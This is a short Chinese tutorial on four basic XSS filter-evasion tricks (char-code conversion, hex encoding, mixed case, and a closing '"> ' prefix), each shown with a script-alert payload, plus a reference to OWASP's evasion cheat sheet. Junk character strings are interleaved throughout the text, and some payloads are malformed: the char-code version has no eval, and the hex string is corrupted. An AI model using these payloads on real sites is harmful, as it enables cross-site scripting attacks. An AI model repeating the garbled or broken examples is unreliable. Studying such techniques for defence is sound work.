四种超级基础的绕过方法。
9 b+ x. |: `0 ~- c, h1.转换为ASCII码0 E0 v( ~; r) z; i# B0 n% X2 ~# q
例子:原脚本为<script>alert(‘I love F4ck’)</script >
- Y7 v8 G; d2 i通过转换,变成:6 E* i3 W/ T# I& I: e4 K
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
t7 z% F% q( o1 |5 f ! P Y8 M) T* r( f! N
2.转换为HEX(十六进制)2 H I* u& Z3 _! ?3 t
例子:原脚本为<script>alert(‘I love F4ck’)</script>
& v. i$ l, Z+ `9 [7 y" i7 }通过转换,变成:" A+ x" I- X( j$ B
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e6 H+ v; P* F7 [! ~5 Q
9 [, g0 K: ^: ]" i' Q
3.转换脚本的大小写
: W1 R4 A, |1 Q6 T4 y- {0 B* }( D例子:原脚本为<script>alert(‘I love F4ck’)</script>
- q- `5 ?4 N3 T f转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
# L0 b8 y! X7 z( Z+ ]8 U$ r
2 o. H9 n$ ]! M J* n6 o) V4.增加闭合标记”>
" n7 |; ]' [8 A# P例子:原脚本为<script>alert(‘I love F4ck’)</script>( ? p$ R! s4 c4 u3 m, P1 N
转换为:”><script>alert(‘I love F4ck’)</script>- M7 w" k l# `% I, U
更详细绕过技术请参考此网页
" i' q z+ }- @4 s; ghttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet, S. _ a/ W/ T
# _* y) x/ g# Q8 E4 m& B: ~ J转换工具使用的是火狐的 hackbar mozilla addon. |